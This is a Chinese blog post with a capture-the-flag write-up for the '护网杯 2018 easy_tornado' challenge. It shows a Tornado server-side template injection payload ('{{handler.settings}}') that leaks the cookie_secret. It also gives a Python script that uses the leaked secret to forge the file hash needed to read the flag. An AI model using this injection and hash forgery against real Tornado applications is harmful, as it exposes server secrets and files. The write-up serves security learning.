首页 > 其他分享 >[护网杯 2018]easy_tornado

[护网杯 2018]easy_tornado

时间:2023-12-11 17:22:25浏览次数:34  
标签:护网杯 hash tornado welcome filename handler 2018 txt

题目打开后如下
image.png
welcome.txt 如下
image.png
提示是 SSTI(模板注入),此时打开了 welcome.txtURL 如下:/file?filename=/welcome.txt&filehash=fe64f8b2cf23eb919623376244ff1269
打开 hint.txt 如下
image.png
打开 flag.txt 如下
image.png
此时将 url 中的 filename 修改为其他字符,页面返回 Error,并且内容为 msg 参数控制
image.png

在tornado模板中,存在一些可以访问的快速对象,比如 {{escape(handler.settings["cookie"])}},这个其实就是handler.settings对象,里面存储着一些环境变量

因此将msg设置为 {{handler.settings}},得到
image.png
通过脚本最终得到 filehash

import hashlib
hash = hashlib.md5()

filename='/fllllllllllllag'
cookie_secret="d834f72e-46c6-41f4-93b2-c5e5fd27b3aa"
hash.update(filename.encode('utf-8'))
s1=hash.hexdigest()
hash = hashlib.md5()
hash.update((cookie_secret+s1).encode('utf-8'))
print("hash:" + hash.hexdigest())

标签:护网杯,hash,tornado,welcome,filename,handler,2018,txt
From: https://www.cnblogs.com/imtaieee/p/17894912.html

相关文章

  • 7. 2023-11-20 12:29:32,542 [tornado.general :456 ][WARNING ][3052] Got events f
     这个警告表明Tornado检测到了有事件(events)被发送到一个已经关闭的流(stream)。在Tornado中,一个流代表一个请求或响应的数据流。这个警告可能意味着在请求处理的过程中,尝试向已经关闭的流发送了事件。可能的原因和解决方法:异步操作处理不当:在Tornado中,当你处理异步请求时,需......
  • JOISC2018 题解
    ContestLinkA.ConstructionofHighwayProblemLink题目大意给\(n\)个点,初始每个点有权值\(w_i\),\(n-1\)次操作连一条边\(u\getsv\),其中\(u\)与\(1\)连通,\(v\)与\(1\)不连通,求\(1\tou\)路径上权值的逆序对数,然后把路径权值推平为\(v\)的权值。数据范围......
  • python学习笔记-tornado框架
    一、简单介绍tornadotornado学习概要1、基本操作 -路由系统 -视图函数2、自定义开源组件 session Form表单验证3、自定义异步非阻塞web框架1、简单示例importtornado.ioloopimporttornado.webclassMainHandle(tornado.web.RequestHandler):defget(self):......
  • P4119 [Ynoi2018] 未来日记
    \(\text{Links}\)LuoguBlogP4119[Ynoi2018]未来日记题外话个人生涯中第一道独立通过的Ynoi大分块!!同时也是个人生涯中通过的第十道Ynoi系列题目!!卡了好久结果加了个优化就过了/yunAC那一瞬间的场面好像56SecondsLater/ll感觉\(8.5\)的评分还是有点虚......
  • ZJOI2018 树
    互异关系容斥即将不等号容斥成等号,对于连通块内的\(\text{GF}\)形式即为\(\ln(x+1)\)的展开级式,即令\(F=\sum_{i=1}^{\infty}\frac{a_{i}(-1)^{i-1}x^i}{i}\),对\(F\)直接\(\exp\)即可。而非常神奇的事情是将带权\(\text{burnside}\)级式写出来后由于圆排列方案数为\(......
  • P4563 [JXOI2018] 守卫
    题目传送门[JXOI2018]守卫思路区间dp。设状态$f_{l,r}$为在区间$[l,r]$内要放的最少保镖数量。看到题面第一眼的感觉是不会判两点能否连接。第二眼发现可以用斜率判。令$k_{l,r}$为横坐标为$l,r$的两点连线斜率。有$k_{l,r}=\frac{h_r-h_l}{r-l}$。手搓几组样......
  • P4770 [NOI2018] 你的名字 做题记录
    我永远喜欢数据结构题目传送门给出字符串\(s\)以及\(q\)个询问,第\(i\)个询问给出一个串\(t_i\)以及一个区间\([l_i,r_i]\)。记\(s[l,r]\)为字符串\(s\)第\(l\)位到第\(r\)位字符顺次拼接而成的子串。形式化地,\(s[l,r]=\overline{s_ls_{l+1}\dotss_r}\)......
  • vulhub中spring的CVE-2018-1273漏洞复现
    ​ 1.影响版本SpringDataCommons1.13-1.13.10(IngallsSR10)SpringDataREST2.6-2.6.10(IngallsSR10)SpringDataCommons2.0to2.0.5(KaySR5)SpringDataREST3.0-3.0.5(KaySR5)2.漏洞原理SpringData是一个用于简化数据库访问,并支持云服务的开源框......
  • [SUCTF2018]followme
    [SUCTF2018]followme看起来像是在做渗透测试的时候抓的包,导出所有HTTP对象大部分是类似这种的文件login%3f_=6975b9a9f7a359d322e06c0e28db112blogin.php%3freferer=http%3A%2F%2F192.168.128.145%2Fbuild%2Fadmin%2F<!DOCTYPEHTML><htmlclass="no-js"><head>......
  • CVE-2018-2628
    WeblogicWLSCoreComponents反序列化命令执行漏洞(CVE-2018-2628)Oracle2018年4月补丁中,修复了WeblogicServerWLSCoreComponents中出现的一个反序列化漏洞(CVE-2018-2628),该漏洞通过t3协议触发,可导致未授权的用户在远程服务器执行任意命令。漏洞环境cdweblogic/CVE-2018-2......